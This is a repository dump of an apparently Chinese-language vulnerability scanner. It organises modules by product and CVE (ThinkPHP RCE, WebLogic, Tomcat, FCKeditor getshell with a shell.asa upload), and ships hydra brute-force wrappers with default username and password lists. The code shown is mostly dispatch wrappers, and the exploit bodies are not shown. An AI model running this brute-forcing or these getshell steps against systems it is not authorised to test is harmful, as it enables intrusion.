├── iis
├── __init__.py
├── Main_iis.py
└── iis_shortname_Scan.py
├── bf_dicts
├── __init__.py
├── SMB-user.txt
├── POP3-user.txt
├── MySQL-user.txt
├── TOMCAT-user.txt
├── SSH-user.txt
├── TELNET-user.txt
├── RDP-user.txt
├── DB2-user.txt
├── FTP-user.txt
├── 通用-常见口令列表.txt
├── TOMCAT-passwd.txt
├── MONGODB-user.txt
├── Microsoft_SQL_Server-user.txt
├── 通用-常见用户名列表.txt
├── Main_bf.py
├── SYBASE-user.txt
├── SYBASE-passwd.txt
├── ORACLE-passwd.txt
├── ORACLE-user.txt
├── bf.py
├── Microsoft_SQL_Server-passwd.txt
├── SNMPpasswd.txt
├── CISCO-equitment-passwd.txt
├── DB2-passwd.txt
├── MySQL-passwd.txt
├── MONGODB-passwd.txt
├── POP3-passwd.txt
├── SMB-passwd.txt
├── FTP-passwd.txt
├── SSH-passwd.txt
├── RDP-passwd.txt
└── TELNET-passwd.txt
├── durpal
├── __init__.py
├── Main_durpal.py
├── CVE_2018_7600.py
└── CVE_2014_3704.py
├── jboss
├── __init__.py
├── Main_jboss.py
├── _updates.py
└── jexboss.py
├── js_find
├── __init__.py
├── Main_js_find.py
└── js_find.py
├── thinkphp
├── __init__.py
├── Main_thinkphp.py
├── thinkphp5_inj_info.py
├── thinkphp5_x_rce.py
└── thinkphp_before5_0_23_rce.py
├── tomcat
├── __init__.py
├── Main_tomcat.py
├── tomcat_weakpasswd.py
├── CVE_2017_12615.py
├── CVE_2017_12617.py
├── example_vulnerability.py
└── CVE_2020_1938.py
├── weblogic
├── __init__.py
├── ssrf.py
├── Main_weblogic.py
├── Common_page.py
├── weblogic_weakpasswd.py
├── CVE_2017_3506.py
├── CVE_2017_10271.py
├── CNVD_C_2019_48814.py
└── CVE_2018_2628.py
├── activemq_vuln
├── __init__.py
├── Main_activemq.py
├── ActiveMQ_uploadfile_cve_2016_3088.py
└── Activemq_weakpasswd.py
├── fckeditor
├── __init__.py
├── shell.asa
├── Main_fckeditor.py
├── fckeditor_version.py
├── fckeditor_dangerfile.py
└── fckeditor_getshell.py
├── gatepass_vuln
├── __init__.py
├── Main_gatepass.py
└── Gate_Pass_Management_System_login_SQL_Injection.py
├── kindeditor
├── __init__.py
├── Main_kindeditor.py
└── kindeditor_under_4_1_5_fileupload.py
├── navigate_vuln
├── __init__.py
├── 88.php
├── Main_navigate.py
└── navigate_Unauthenticated_Remote_Code_Execution_CVE_2018_17553.py
├── redis_vuln
├── __init__.py
├── Main_redis.py
└── redis_unauthorized.py
├── spring_vuln
├── __init__.py
├── Main_spring.py
└── CVE_2018_1273.py
├── zabbix_vuln
├── __init__.py
├── Main_zabbix.py
├── Authentication_Bypass.py
└── zabbix_sql_CVE_2016_10134.py
├── docker_vuln
├── __init__.py
├── Main_docker.py
└── docker_daemon_api.py
├── memcache_vuln
├── __init__.py
├── Main_memcache_vuln.py
└── memcache_un.py
├── search_exploits
├── __init__.py
├── Main_search_exploits.py
└── search_exploit.py
├── requirements.txt
├── .gitignore
├── .vscode
└── settings.json
├── README.md
└── moon.py
/iis/__init__.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
--------------------------------------------------------------------------------
/bf_dicts/__init__.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
--------------------------------------------------------------------------------
/durpal/__init__.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
--------------------------------------------------------------------------------
/jboss/__init__.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
--------------------------------------------------------------------------------
/js_find/__init__.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
--------------------------------------------------------------------------------
/thinkphp/__init__.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
--------------------------------------------------------------------------------
/tomcat/__init__.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
--------------------------------------------------------------------------------
/weblogic/__init__.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
--------------------------------------------------------------------------------
/activemq_vuln/__init__.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
--------------------------------------------------------------------------------
/fckeditor/__init__.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
--------------------------------------------------------------------------------
/gatepass_vuln/__init__.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
--------------------------------------------------------------------------------
/kindeditor/__init__.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
--------------------------------------------------------------------------------
/navigate_vuln/__init__.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
--------------------------------------------------------------------------------
/redis_vuln/__init__.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
--------------------------------------------------------------------------------
/spring_vuln/__init__.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
--------------------------------------------------------------------------------
/zabbix_vuln/__init__.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
--------------------------------------------------------------------------------
/docker_vuln/__init__.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 |
--------------------------------------------------------------------------------
/memcache_vuln/__init__.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 |
--------------------------------------------------------------------------------
/search_exploits/__init__.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
--------------------------------------------------------------------------------
/bf_dicts/SMB-user.txt:
--------------------------------------------------------------------------------
1 | Administrator
2 | Guest
3 | test
4 |
--------------------------------------------------------------------------------
/bf_dicts/POP3-user.txt:
--------------------------------------------------------------------------------
1 | desc
2 | test@example.com
3 | root@example.com
--------------------------------------------------------------------------------
/bf_dicts/MySQL-user.txt:
--------------------------------------------------------------------------------
1 | root
2 | mysql
3 | test
4 | user
5 | guest
6 |
--------------------------------------------------------------------------------
/bf_dicts/TOMCAT-user.txt:
--------------------------------------------------------------------------------
1 | admin
2 | tomcat
3 | both
4 | role1
5 | root
6 |
--------------------------------------------------------------------------------
/bf_dicts/SSH-user.txt:
--------------------------------------------------------------------------------
1 | root
2 | mysql
3 | oracle
4 | test
5 | user
6 | guest
7 |
--------------------------------------------------------------------------------
/bf_dicts/TELNET-user.txt:
--------------------------------------------------------------------------------
1 | administrator
2 | root
3 | admin
4 | test
5 | guest
6 |
--------------------------------------------------------------------------------
/bf_dicts/RDP-user.txt:
--------------------------------------------------------------------------------
1 | Administrator
2 | Guest
3 | test
4 | administrator
5 | admin
6 |
--------------------------------------------------------------------------------
/bf_dicts/DB2-user.txt:
--------------------------------------------------------------------------------
1 | db2inst1
2 | db2admin
3 | Administrator
4 | db2fenc1
5 | dasusr1
6 |
--------------------------------------------------------------------------------
/fckeditor/shell.asa:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/1120362990/vulnerability-list/HEAD/fckeditor/shell.asa
--------------------------------------------------------------------------------
/navigate_vuln/88.php:
--------------------------------------------------------------------------------
1 |
--------------------------------------------------------------------------------
/bf_dicts/FTP-user.txt:
--------------------------------------------------------------------------------
1 | desc
2 | ftp
3 | root
4 | anonymous
5 | guest
6 | Administrator
7 | user
8 |
--------------------------------------------------------------------------------
/bf_dicts/通用-常见口令列表.txt:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/1120362990/vulnerability-list/HEAD/bf_dicts/通用-常见口令列表.txt
--------------------------------------------------------------------------------
/requirements.txt:
--------------------------------------------------------------------------------
1 | requests
2 | bs4
3 | requests_toolbelt
4 | docker
5 | redis
6 | python3-memcached
7 | lxml
8 | struct
9 | socket
--------------------------------------------------------------------------------
/bf_dicts/TOMCAT-passwd.txt:
--------------------------------------------------------------------------------
1 | admin
2 | tomcat
3 | 123
4 | 123456
5 | root
6 | fgh@#$
7 | qwe!@#
8 | admin123
9 | admin123456
10 |
--------------------------------------------------------------------------------
/bf_dicts/MONGODB-user.txt:
--------------------------------------------------------------------------------
1 | admin
2 | root
3 | user
4 | test
5 | accountAdmin01
6 | testuser
7 | accountUser
8 | reportsUser
9 | appAdmin
10 | mongouser
11 |
--------------------------------------------------------------------------------
/.gitignore:
--------------------------------------------------------------------------------
1 | # Byte-compiled / optimized / DLL files
2 |
3 | __pycache__/
4 |
5 | *.py[cod]
6 |
7 | *$py.class
8 |
9 | *.xml
10 | *.iml
11 | *.log
12 | .vscode/settings.json
13 |
--------------------------------------------------------------------------------
/bf_dicts/Microsoft_SQL_Server-user.txt:
--------------------------------------------------------------------------------
1 | sa
2 | probe
3 | repl_publisher
4 | repl_subscriber
5 | distributor_admin
6 | admin
7 | Administrator
8 | guest
9 | test
10 | root
11 |
--------------------------------------------------------------------------------
/bf_dicts/通用-常见用户名列表.txt:
--------------------------------------------------------------------------------
1 | Administrator
2 | root
3 | test
4 | system
5 | admin
6 | administrator
7 | guest
8 | ftp
9 | user
10 | guest
11 | sa
12 | manager
13 | lp
14 | sys
15 | adm
16 |
--------------------------------------------------------------------------------
/js_find/Main_js_find.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 | import js_find.js_find
3 |
def exec(URL):
    """Run the ``js_find`` package's check against *URL*.

    Thin dispatch wrapper (presumably called by moon.py); all work is done
    by ``js_find.js_find.attack``.  The name shadows the builtin ``exec``
    on purpose — it is the convention every ``Main_*`` module follows.
    """
    scan = js_find.js_find.attack
    scan(URL)
6 |
7 |
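if __name__ == "__main__":
    # Stand-alone use takes the target from the command line.  The old
    # guard called exec() with no arguments, which always raised TypeError.
    import sys

    if len(sys.argv) != 2:
        sys.exit(f"usage: {sys.argv[0]} URL")
    exec(sys.argv[1])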
10 |
--------------------------------------------------------------------------------
/.vscode/settings.json:
--------------------------------------------------------------------------------
1 | {
2 | "python.linting.flake8Enabled": true,
3 | "python.linting.pylintEnabled": false,
4 | "python.linting.enabled": true,
5 | "python.pythonPath": "C:\\python3\\python.exe"
6 | }
--------------------------------------------------------------------------------
/bf_dicts/Main_bf.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 | import bf_dicts.bf
3 |
4 |
def exec(service,ip,port):
    """Dispatch a word-list (hydra) attack through ``bf_dicts.bf.attack``.

    ``service`` is the hydra module name, ``ip``/``port`` the target; the
    arguments are forwarded unchanged.
    """
    runner = bf_dicts.bf.attack
    runner(service, ip, port)
7 |
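if __name__ == "__main__":
    # Stand-alone use: SERVICE IP PORT from the command line.  The old
    # guard called exec() with no arguments, which always raised TypeError.
    import sys

    if len(sys.argv) != 4:
        sys.exit(f"usage: {sys.argv[0]} SERVICE IP PORT")
    exec(sys.argv[1], sys.argv[2], sys.argv[3])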
10 |
--------------------------------------------------------------------------------
/bf_dicts/SYBASE-user.txt:
--------------------------------------------------------------------------------
1 | admin
2 | Mon_user
3 | Dba
4 | entldbdbo
5 | entldbreader
6 | jagadmin
7 | PlAdmin
8 | pkiuser
9 | PortalAdmin
10 | pso
11 | dbo
12 | probe
13 | sybmail
14 | test
15 | sa
16 |
--------------------------------------------------------------------------------
/spring_vuln/Main_spring.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 | import spring_vuln.CVE_2018_1273
3 |
4 |
def exec(URL):
    """Run the Spring CVE-2018-1273 check against *URL*.

    Dispatch wrapper only; the probe lives in ``spring_vuln.CVE_2018_1273``.
    """
    check = spring_vuln.CVE_2018_1273.attack
    check(URL)
7 |
8 |
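if __name__ == "__main__":
    # Stand-alone use takes the target from the command line.  The old
    # guard called exec() with no arguments, which always raised TypeError.
    import sys

    if len(sys.argv) != 2:
        sys.exit(f"usage: {sys.argv[0]} URL")
    exec(sys.argv[1])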
11 |
--------------------------------------------------------------------------------
/docker_vuln/Main_docker.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 | import docker_vuln.docker_daemon_api
3 |
4 |
def exec(URL):
    """Run the Docker daemon API exposure check against *URL*.

    Dispatch wrapper only; see ``docker_vuln.docker_daemon_api.attack``.
    """
    check = docker_vuln.docker_daemon_api.attack
    check(URL)
7 |
8 |
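if __name__ == "__main__":
    # Stand-alone use takes the target from the command line.  The old
    # guard called exec() with no arguments, which always raised TypeError.
    import sys

    if len(sys.argv) != 2:
        sys.exit(f"usage: {sys.argv[0]} URL")
    exec(sys.argv[1])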
11 |
--------------------------------------------------------------------------------
/redis_vuln/Main_redis.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 | import redis_vuln.redis_unauthorized
3 |
4 |
def exec(URL):
    """Run the Redis unauthenticated-access check against *URL*.

    Dispatch wrapper only; see ``redis_vuln.redis_unauthorized.attack``.
    """
    check = redis_vuln.redis_unauthorized.attack
    check(URL)
7 |
8 |
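if __name__ == "__main__":
    # Stand-alone use takes the target from the command line.  The old
    # guard called exec() with no arguments, which always raised TypeError.
    import sys

    if len(sys.argv) != 2:
        sys.exit(f"usage: {sys.argv[0]} URL")
    exec(sys.argv[1])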
11 |
--------------------------------------------------------------------------------
/bf_dicts/SYBASE-passwd.txt:
--------------------------------------------------------------------------------
1 | abc123
2 | xiaoming
3 | iloveyou
4 | admin
5 | SQL
6 | dbopswd
7 | rdrpswd
8 | pkipasswd
9 | sybase
10 | fgh@#$
11 | 123qwe
12 | 123456
13 | 12345678
14 | 123
15 | qq123456
16 | taobao
17 | wang1234
18 |
--------------------------------------------------------------------------------
/search_exploits/Main_search_exploits.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 | import search_exploits.search_exploit
3 |
4 |
def exec(URL):
    """Search exploitalert for known exploits matching *URL*.

    Dispatch wrapper only; see ``search_exploits.search_exploit.attack``.
    """
    search = search_exploits.search_exploit.attack
    search(URL)
7 |
8 |
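if __name__ == "__main__":
    # Stand-alone use takes the target from the command line.  The old
    # guard called exec() with no arguments, which always raised TypeError.
    import sys

    if len(sys.argv) != 2:
        sys.exit(f"usage: {sys.argv[0]} URL")
    exec(sys.argv[1])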
11 |
--------------------------------------------------------------------------------
/memcache_vuln/Main_memcache_vuln.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 | import memcache_vuln.memcache_un
3 |
4 |
def exec(URL):
    """Run the memcached unauthenticated-access check against *URL*.

    Dispatch wrapper only; see ``memcache_vuln.memcache_un.attack``.
    """
    check = memcache_vuln.memcache_un.attack
    check(URL)
8 |
9 |
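if __name__ == "__main__":
    # Stand-alone use takes the target from the command line.  The old
    # guard called exec() with no arguments, which always raised TypeError.
    import sys

    if len(sys.argv) != 2:
        sys.exit(f"usage: {sys.argv[0]} URL")
    exec(sys.argv[1])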
12 |
--------------------------------------------------------------------------------
/kindeditor/Main_kindeditor.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 | import os
3 | import kindeditor.kindeditor_under_4_1_5_fileupload
4 |
5 |
def exec(URL):
    """Run the KindEditor (< 4.1.5) file-upload check against *URL*.

    Dispatch wrapper only; see
    ``kindeditor.kindeditor_under_4_1_5_fileupload.attack``.
    """
    check = kindeditor.kindeditor_under_4_1_5_fileupload.attack
    check(URL)
8 |
9 |
10 |
11 |
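if __name__ == "__main__":
    # Stand-alone use takes the target from the command line.  The old
    # guard called exec() with no arguments, which always raised TypeError.
    import sys

    if len(sys.argv) != 2:
        sys.exit(f"usage: {sys.argv[0]} URL")
    exec(sys.argv[1])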
14 |
--------------------------------------------------------------------------------
/gatepass_vuln/Main_gatepass.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 | import gatepass_vuln.Gate_Pass_Management_System_login_SQL_Injection
3 |
4 |
def exec(URL):
    """Run the Gate Pass Management System login SQL-injection check against *URL*.

    Dispatch wrapper only; see
    ``gatepass_vuln.Gate_Pass_Management_System_login_SQL_Injection.attack``.
    """
    check = gatepass_vuln.Gate_Pass_Management_System_login_SQL_Injection.attack
    check(URL)
7 |
8 |
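if __name__ == "__main__":
    # Stand-alone use takes the target from the command line.  The old
    # guard called exec() with no arguments, which always raised TypeError.
    import sys

    if len(sys.argv) != 2:
        sys.exit(f"usage: {sys.argv[0]} URL")
    exec(sys.argv[1])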
11 |
--------------------------------------------------------------------------------
/bf_dicts/ORACLE-passwd.txt:
--------------------------------------------------------------------------------
1 | SYSTEM
2 | system
3 | 123456
4 | abc123
5 | xiaoming
6 | 12345678
7 | iloveyou
8 | admin
9 | qq123456
10 | taobao
11 | root
12 | wang1234
13 | MANAGER
14 | CHANGE_ON_INSTALL
15 | internal
16 | 123456
17 | 8888
18 | 888888
19 | 1234
20 | fgh@#$
21 | qwe!@#
22 |
--------------------------------------------------------------------------------
/durpal/Main_durpal.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 | import os
3 | import durpal.CVE_2014_3704
4 | import durpal.CVE_2018_7600
5 |
def exec(URL):
    """Run every check in the ``durpal`` package (presumably Drupal, given the
    CVE numbers) against *URL*, in the fixed order below.

    A check that raises stops the sequence — nothing here catches exceptions.
    """
    checks = (
        durpal.CVE_2014_3704.attack,
        durpal.CVE_2018_7600.attack,
    )
    for check in checks:
        check(URL)
9 |
10 |
11 |
12 |
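if __name__ == "__main__":
    # Stand-alone use takes the target from the command line.  The old
    # guard called exec() with no arguments, which always raised TypeError.
    import sys

    if len(sys.argv) != 2:
        sys.exit(f"usage: {sys.argv[0]} URL")
    exec(sys.argv[1])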
15 |
--------------------------------------------------------------------------------
/navigate_vuln/Main_navigate.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 | import navigate_vuln.navigate_Unauthenticated_Remote_Code_Execution_CVE_2018_17553
3 |
4 |
def exec(URL):
    """Run the Navigate CMS CVE-2018-17553 unauthenticated RCE check against *URL*.

    Dispatch wrapper only; the probe lives in
    ``navigate_vuln.navigate_Unauthenticated_Remote_Code_Execution_CVE_2018_17553``.
    """
    check = navigate_vuln.navigate_Unauthenticated_Remote_Code_Execution_CVE_2018_17553.attack
    check(URL)
7 |
8 |
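if __name__ == "__main__":
    # Stand-alone use takes the target from the command line.  The old
    # guard called exec() with no arguments, which always raised TypeError.
    import sys

    if len(sys.argv) != 2:
        sys.exit(f"usage: {sys.argv[0]} URL")
    exec(sys.argv[1])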
11 |
--------------------------------------------------------------------------------
/zabbix_vuln/Main_zabbix.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 | import zabbix_vuln.zabbix_sql_CVE_2016_10134
3 | import zabbix_vuln.Authentication_Bypass
4 |
5 |
def exec(URL):
    """Run the Zabbix checks against *URL*: the CVE-2016-10134 SQL injection
    first, then the authentication bypass.

    A check that raises stops the sequence — nothing here catches exceptions.
    """
    checks = (
        zabbix_vuln.zabbix_sql_CVE_2016_10134.attack,
        zabbix_vuln.Authentication_Bypass.attack,
    )
    for check in checks:
        check(URL)
9 |
10 |
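if __name__ == "__main__":
    # Stand-alone use takes the target from the command line.  The old
    # guard called exec() with no arguments, which always raised TypeError.
    import sys

    if len(sys.argv) != 2:
        sys.exit(f"usage: {sys.argv[0]} URL")
    exec(sys.argv[1])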
13 |
--------------------------------------------------------------------------------
/bf_dicts/ORACLE-user.txt:
--------------------------------------------------------------------------------
1 | SYSTEM
2 | SYS
3 | DBSNMP
4 | SCOTT
5 | OUTLN
6 | MDSYS
7 | ORDSYS
8 | WKSYS
9 | OLAPDBA
10 | CTXSYS
11 | OLAPSYS
12 | ORDPLUGINS
13 | QS_CBADM
14 | demo
15 | ORACLE
16 | missys
17 | RMAN
18 | QS_OS
19 | QS_ES
20 | SH
21 | PM
22 | OE
23 | HR
24 | QS_WS
25 | QS
26 | QS_ADM
27 | QS_CS
28 | QS_CB
29 |
--------------------------------------------------------------------------------
/jboss/Main_jboss.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
import os
import subprocess

import jboss
4 |
5 |
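def exec(URL):
    """Run the bundled jexboss scanner (a Python 2 script) against *URL*.

    jexboss.py is launched as a child process through the ``py -2``
    launcher, as before, with two fixes:

    * the command is passed as an argument list (no shell), so a URL
      containing shell metacharacters such as ``;``, ``&`` or ``$(…)``
      cannot inject extra commands into the operator's shell;
    * the script directory is resolved with ``os.path.dirname`` and passed
      as ``cwd`` instead of ``os.chdir(realpath(__file__)[:35])``, which
      hard-coded a path length that only matched one checkout location and
      permanently changed the working directory of the whole scanner
      (other modules, e.g. ``bf_dicts/bf.py``, use relative paths).

    A missing launcher is reported instead of crashing the scan; jexboss's
    exit status is not checked, mirroring the previous ``os.system`` call.
    """
    print('[+]开始检测-jboss。[+]')
    script_dir = os.path.dirname(os.path.realpath(__file__))
    try:
        subprocess.run(
            ["py", "-2", "jexboss.py", "-host", URL],
            cwd=script_dir,
            check=False,
        )
    except OSError as e:
        # e.g. the "py" launcher is not installed (it is Windows-specific)
        print(f'[-]could not launch jexboss.py: {e}')
    print('[+]检测结束-jboss。[+]')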
12 |
13 |
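if __name__ == "__main__":
    # Stand-alone use takes the target from the command line.  The old
    # guard called exec() with no arguments, which always raised TypeError.
    import sys

    if len(sys.argv) != 2:
        sys.exit(f"usage: {sys.argv[0]} URL")
    exec(sys.argv[1])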
16 |
--------------------------------------------------------------------------------
/activemq_vuln/Main_activemq.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 | import activemq_vuln.ActiveMQ_uploadfile_cve_2016_3088
3 | import activemq_vuln.Activemq_weakpasswd
4 |
5 |
def exec(URL):
    """Run the ActiveMQ checks against *URL*: the weak-password check first,
    then the CVE-2016-3088 file-upload check.

    A check that raises stops the sequence — nothing here catches exceptions.
    """
    checks = (
        activemq_vuln.Activemq_weakpasswd.attack,
        activemq_vuln.ActiveMQ_uploadfile_cve_2016_3088.attack,
    )
    for check in checks:
        check(URL)
9 |
10 |
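if __name__ == "__main__":
    # Stand-alone use takes the target from the command line.  The old
    # guard called exec() with no arguments, which always raised TypeError.
    import sys

    if len(sys.argv) != 2:
        sys.exit(f"usage: {sys.argv[0]} URL")
    exec(sys.argv[1])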
13 |
--------------------------------------------------------------------------------
/iis/Main_iis.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 | import iis.iis_shortname_Scan
3 | import os
4 |
def exec(URL):
    """Run the IIS short-filename scan against *URL*.

    The scan runs in-process via ``iis.iis_shortname_Scan.attack``; the
    earlier ``os.chdir`` + ``py -2`` subprocess variant is gone.
    """
    scan = iis.iis_shortname_Scan.attack
    scan(URL)
13 |
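if __name__ == "__main__":
    # Stand-alone use takes the target from the command line.  The old
    # guard called exec() with no arguments, which always raised TypeError.
    import sys

    if len(sys.argv) != 2:
        sys.exit(f"usage: {sys.argv[0]} URL")
    exec(sys.argv[1])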
16 |
--------------------------------------------------------------------------------
/thinkphp/Main_thinkphp.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 | import thinkphp.thinkphp5_inj_info
3 | import thinkphp.thinkphp5_x_rce
4 | import thinkphp.thinkphp_before5_0_23_rce
5 |
6 |
def exec(URL):
    """Run the ThinkPHP checks against *URL* in order: the 5.x injection /
    info probe, the 5.x RCE probe, then the pre-5.0.23 RCE probe.

    A check that raises stops the sequence — nothing here catches exceptions.
    """
    checks = (
        thinkphp.thinkphp5_inj_info.attack,
        thinkphp.thinkphp5_x_rce.attack,
        thinkphp.thinkphp_before5_0_23_rce.attack,
    )
    for check in checks:
        check(URL)
11 |
12 |
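if __name__ == "__main__":
    # Stand-alone use takes the target from the command line.  The old
    # guard called exec() with no arguments, which always raised TypeError.
    import sys

    if len(sys.argv) != 2:
        sys.exit(f"usage: {sys.argv[0]} URL")
    exec(sys.argv[1])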
15 |
--------------------------------------------------------------------------------
/fckeditor/Main_fckeditor.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 | import fckeditor.fckeditor_version
3 | import fckeditor.fckeditor_dangerfile
4 | import fckeditor.fckeditor_getshell
5 |
6 |
def exec(URL):
    """Run the FCKeditor checks against *URL* in order: version detection,
    dangerous-file listing, then the getshell attempt.

    Note that the last step is an exploitation attempt (it uploads
    ``shell.asa`` from this package, judging by the file list), not a
    passive probe — run it only with authorisation.  A check that raises
    stops the sequence.
    """
    checks = (
        fckeditor.fckeditor_version.attack,
        fckeditor.fckeditor_dangerfile.attack,
        fckeditor.fckeditor_getshell.attack,
    )
    for check in checks:
        check(URL)
11 |
12 |
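if __name__ == "__main__":
    # Stand-alone use takes the target from the command line.  The old
    # guard called exec() with no arguments, which always raised TypeError.
    import sys

    if len(sys.argv) != 2:
        sys.exit(f"usage: {sys.argv[0]} URL")
    exec(sys.argv[1])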
15 |
--------------------------------------------------------------------------------
/bf_dicts/bf.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
import os
import subprocess

import docker
4 |
5 | '''
6 | hydra
7 | '''
8 |
9 |
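# hydra service name -> (user list, password list) shipped in this directory.
# Only services whose word lists are present next to this file are listed;
# "ftp" was the only entry the original code handled.
_DICTS = {
    'ftp': ('FTP-user.txt', 'FTP-passwd.txt'),
    'ssh': ('SSH-user.txt', 'SSH-passwd.txt'),
    'telnet': ('TELNET-user.txt', 'TELNET-passwd.txt'),
    'smb': ('SMB-user.txt', 'SMB-passwd.txt'),
    'pop3': ('POP3-user.txt', 'POP3-passwd.txt'),
    'mysql': ('MySQL-user.txt', 'MySQL-passwd.txt'),
    'rdp': ('RDP-user.txt', 'RDP-passwd.txt'),
}


def attack(service, ip, port):
    """Run hydra with this directory's word lists against ``ip:port``.

    ``service`` is the hydra module name (``ftp``, ``ssh`` …, see
    ``_DICTS``); unsupported services are reported and skipped.  hydra is
    invoked as ``hydra -L <users> -P <passwords> -V -s <port> <ip> <service>``.

    Changes from the original:

    * the command is built as an argument list and run without a shell, so
      ``ip``/``port``/``service`` values containing shell metacharacters
      cannot inject commands (the old f-string went through ``os.system``);
    * the word-list directory is passed as ``cwd`` instead of
      ``os.chdir('bf_dicts')``, which only worked when the process happened
      to be started from the repository root and changed the working
      directory for every later module;
    * a missing ``hydra`` binary is reported rather than silently producing
      a shell "command not found".

    hydra's exit status is not checked, mirroring ``os.system``.  The final
    ``print(service, ip, port)`` is kept for output compatibility.
    """
    lists = _DICTS.get(service)
    if lists is None:
        print('Service for -'+service+'- not support!')
    else:
        user_list, pass_list = lists
        cmd = [
            'hydra', '-L', user_list, '-P', pass_list, '-V',
            '-s', str(port), str(ip), service,
        ]
        dict_dir = os.path.dirname(os.path.realpath(__file__))
        try:
            subprocess.run(cmd, cwd=dict_dir, check=False)
        except OSError as e:
            print(f'hydra could not be started: {e}')

    print(service, ip, port)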
18 |
19 |
20 |
21 |
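if __name__ == "__main__":
    # Stand-alone use: SERVICE IP PORT from the command line.  The old
    # guard called attack() with no arguments, which always raised TypeError.
    import sys

    if len(sys.argv) != 4:
        sys.exit(f"usage: {sys.argv[0]} SERVICE IP PORT")
    attack(sys.argv[1], sys.argv[2], sys.argv[3])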
24 |
--------------------------------------------------------------------------------
/search_exploits/search_exploit.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 | import requests
3 |
4 |
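def attack(URL):
    """Query the exploitalert search API for *URL* and print every hit.

    Sends ``GET https://www.exploitalert.com/api/search-exploit?name=<URL>``
    — the caller's string is used verbatim as the search term — and prints
    each element of the JSON result.

    Fixes over the original: the request has a timeout (it could previously
    block the whole scan indefinitely), non-2xx responses and non-JSON
    bodies (e.g. an HTML error page, which used to raise from ``r.json()``)
    are reported instead of crashing, and an empty JSON list is reported as
    "no results" like an empty body already was.
    """
    print(f'[+]开始在exploitalert中搜索 {URL} 存在的历史漏洞。')
    payload = {'name': URL}
    hits = None
    try:
        r = requests.get(
            "https://www.exploitalert.com/api/search-exploit",
            params=payload,
            timeout=15,
        )
        r.raise_for_status()
        hits = r.json() if r.text.strip() else []
    except requests.exceptions.RequestException as e:
        print(f'[-]exploitalert request failed: {e}')
    except ValueError:
        print('[-]exploitalert returned a non-JSON response')

    if hits is not None:
        if not hits:
            print('未发现历史漏洞!')
        else:
            # each hit is printed as-is (a dict per result, by the look of the
            # original loop); "json" was renamed to avoid shadowing the module
            for hit in hits:
                print(hit)
    print(f'[+]在exploitalert中搜索 {URL} 存在的历史漏洞结束。')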
15 |
16 |
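if __name__ == "__main__":
    # Stand-alone use takes the search term from the command line.  The old
    # guard called attack() with no arguments, which always raised TypeError.
    import sys

    if len(sys.argv) != 2:
        sys.exit(f"usage: {sys.argv[0]} URL")
    attack(sys.argv[1])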
19 |
--------------------------------------------------------------------------------
/tomcat/Main_tomcat.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 | import tomcat.CVE_2017_12615
3 | import tomcat.example_vulnerability
4 | import tomcat.CVE_2017_12617
5 | import tomcat.tomcat_weakpasswd
6 | import tomcat.CVE_2020_1938
7 |
8 |
def exec(URL):
    """Run the Tomcat checks against *URL* in order: the examples-app check,
    CVE-2017-12615, CVE-2017-12617, the weak-password check, then
    CVE-2020-1938 (AJP "Ghostcat").

    A check that raises stops the sequence — nothing here catches exceptions.
    """
    checks = (
        tomcat.example_vulnerability.attack,
        tomcat.CVE_2017_12615.attack,
        tomcat.CVE_2017_12617.attack,
        tomcat.tomcat_weakpasswd.attack,
        tomcat.CVE_2020_1938.attack,
    )
    for check in checks:
        check(URL)
15 |
16 |
17 |
18 |
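if __name__ == "__main__":
    # Stand-alone use takes the target from the command line.  The old
    # guard called exec() with no arguments, which always raised TypeError.
    import sys

    if len(sys.argv) != 2:
        sys.exit(f"usage: {sys.argv[0]} URL")
    exec(sys.argv[1])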
21 |
--------------------------------------------------------------------------------
/memcache_vuln/memcache_un.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 | import memcache
3 |
4 |
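def attack(URL):
    """Check whether the memcached server named in *URL* answers ``stats``
    without authentication.

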